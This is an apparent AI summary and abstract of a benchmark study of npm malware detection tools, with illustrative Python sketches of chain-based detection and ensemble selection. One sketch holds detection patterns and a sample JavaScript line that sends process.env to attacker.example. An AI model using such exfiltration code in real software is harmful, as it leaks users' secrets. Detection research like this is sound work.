🤖 AI Summary
This study addresses the lack of a unified benchmark for evaluating malicious npm package detection tools, which has made cross-tool assessments unreliable. The authors construct a labeled dataset of 6,420 malicious and 7,288 benign packages, covering 11 types of malicious behavior and 8 evasion techniques, and present the first systematic evaluation of 13 variants across 8 detection tools, combining quantitative metrics with source-code-level mechanistic analysis. Their findings show that detection performance hinges on how each tool resolves the ambiguity between what code can do and what it intends to do, leading them to propose a discriminative logic based on behavior chains rather than isolated API calls. Experiments show GuardDog achieves the best single-tool performance (F1 = 93.32%), while behavior-chain recognition raises one tool's (SAP_DT's) detection rate from 3.2% to 79.3%. An optimal ensemble of tools attains 96.08% accuracy and a 95.79% F1 score.
📝 Abstract
The npm ecosystem has become a primary target for software supply chain attacks, yet existing detection tools are evaluated in isolation on incompatible datasets, making cross-tool comparison unreliable. We conduct a benchmark-driven empirical analysis of npm malware detection, building a dataset of 6,420 malicious and 7,288 benign packages annotated with 11 behavior categories and 8 evasion techniques, and evaluating 8 tools across 13 variants. Unlike prior work, we complement quantitative evaluation with source-code inspection of each tool to expose the structural mechanisms behind its performance.
Our analysis reveals five key findings. (1) Tools' precision-recall positions are structurally determined by how each resolves the ambiguity between what code can do and what it intends to do, with GuardDog achieving the best balance at 93.32% F1. (2) A single API call carries no directional intent, but a behavioral chain, such as collecting environment variables, serializing them, and exfiltrating the result, disambiguates malicious purpose, raising SAP_DT's detection rate from 3.2% to 79.3%. (3) Most malware employs no evasion, because the ecosystem lacks mandatory pre-publication scanning. (4) ML degradation stems from concept convergence rather than concept drift: malware has become simpler and statistically indistinguishable from benign code in feature space. (5) Tool-combination effectiveness is governed by complementarity minus the false positives introduced, not paradigm diversity, with strategic combinations reaching 96.08% accuracy and 95.79% F1. Our benchmark and evaluation framework are publicly available.
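The behavior-chain idea described in the abstract can be sketched as a co-occurrence check over suspicious APIs. This is an illustrative simplification, not the paper's actual detector: the `EXFIL_CHAIN` patterns and the `matches_chain` helper are hypothetical, and a real tool would track data flow through an AST rather than textual co-occurrence.

```python
import re

# Illustrative chain for an environment-variable exfiltration behavior.
# Patterns and helper names are hypothetical, for exposition only.
EXFIL_CHAIN = [
    r"process\.env",                  # collect environment variables
    r"JSON\.stringify",               # serialize the collected data
    r"require\(['\"]https?['\"]\)",   # load a network module to exfiltrate
]

def matches_chain(source: str, chain=EXFIL_CHAIN) -> bool:
    """Flag a package only when every stage of the chain is present."""
    return all(re.search(stage, source) for stage in chain)

# A single suspicious API is ambiguous: serialization alone is benign...
benign = "module.exports = (obj) => JSON.stringify(obj);"

# ...but the full collect -> serialize -> exfiltrate chain disambiguates.
malicious = (
    "const payload = JSON.stringify(process.env);\n"
    "require('https').request({ host: 'attacker.example', "
    "method: 'POST' }).end(payload);"
)
```

Requiring the whole chain, rather than any single call, is what separates capability from intent in this sketch.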
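The combination principle, complementarity minus false-positive introduction, can be illustrated with a greedy OR-ensemble that admits a tool only while it raises the combined F1, i.e. while the true positives it contributes outweigh the false positives it introduces. The tool names and predictions below are toy data, not the paper's results.

```python
# Toy sketch of ensemble selection by net complementarity.
# Tool names and prediction vectors are invented for illustration.

def f1(preds, labels):
    tp = sum(p and y for p, y in zip(preds, labels))
    fp = sum(p and not y for p, y in zip(preds, labels))
    fn = sum(not p and y for p, y in zip(preds, labels))
    return 2 * tp / (2 * tp + fp + fn) if tp else 0.0

def union(a, b):
    return [x or y for x, y in zip(a, b)]

def greedy_ensemble(tool_preds, labels):
    """Add tools one at a time, keeping only F1-improving additions."""
    combined = [False] * len(labels)
    chosen = []
    while True:
        best = None
        for name, preds in tool_preds.items():
            if name in chosen:
                continue
            cand = union(combined, preds)
            if f1(cand, labels) > f1(combined, labels) and (
                best is None or f1(cand, labels) > f1(best[1], labels)
            ):
                best = (name, cand)
        if best is None:
            return chosen, combined
        chosen.append(best[0])
        combined = best[1]

labels = [True, True, True, False, False]
tools = {
    "toolA": [True, True, False, False, False],   # precise but partial
    "toolB": [False, False, True, True, True],    # broad but noisy
    "toolC": [False, False, True, False, False],  # complements toolA
}
```

On this toy data the procedure keeps toolA and toolC but rejects toolB: toolB's extra detections duplicate toolC's while introducing false positives, so paradigm diversity alone does not help.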